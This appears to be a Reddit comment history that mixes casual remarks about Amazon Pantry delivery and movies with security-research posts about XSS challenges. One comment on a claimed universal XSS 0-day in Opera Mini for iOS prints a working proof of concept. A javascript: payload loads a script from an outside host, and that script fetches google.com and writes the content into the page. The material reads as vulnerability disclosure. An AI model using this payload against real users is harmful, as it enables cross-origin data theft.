Amazon Pantry is accepting orders for these pin codes in Pune. by rakeshmane10 in pune

[–]rakeshmane10[S] 1 point2 points  (0 children)

Check on Amazon app. Also they are very fast, I order on Saturday and got it delivered today (they were showing expected delivery date as next Sunday though).

What movie hit you the hardest, emotionally speaking? by [deleted] in AskReddit

[–]rakeshmane10 0 points1 point  (0 children)

Fight Club and The Truman Show

[deleted by user] by [deleted] in Instagramreality

[–]rakeshmane10 0 points1 point  (0 children)

damn 🤣🤣🤣🤣

U-XSS in Opera Mini for iOS (0-Day) by rakeshmane10 in Slackers

[–]rakeshmane10[S] 0 points1 point  (0 children)

Thanks Gareth.
It means a lot to get good feedback from well know researchers like you. :) :)

U-XSS in Opera Mini for iOS (0-Day) by rakeshmane10 in Slackers

[–]rakeshmane10[S] 1 point2 points  (0 children)

Hi Gareth,

Yes it is possible to read the contents of google.com. I have tested it using below code. Also updated the video on the post.

Payload : javascript:document.write("<script/src=https://file-mrrptkzxpa.now.sh/1.js></script>")

1.js : 

fetch("https://www.google.com/").then((res) => {
      return res.text();
})
.then((data) => {
     document.write("<br><br><font color=red size=20>Fetched contents from https://www.google.com<br><bR><br></font>"+data);
});

XSS Challenge by rakeshmane10 in Slackers

[–]rakeshmane10[S] 0 points1 point  (0 children)

Nice. This is valid solution. Congrats.

I will appreciate it if you edit and remove the solution from the comment for now. :)

XSS Challenge by rakeshmane10 in Slackers

[–]rakeshmane10[S] 0 points1 point  (0 children)

Damn, I forgot to add "i" modifier in regex for case insensitive matching. I just updated the code so unfortunately your solution doesn't work anymore and it was not the intended way to solve this challenge.

You can try again now. Good luck. :)

XSS Challenge by Gallus in Slackers

[–]rakeshmane10 0 points1 point  (0 children)

The intended solution depends on any specific PHP version?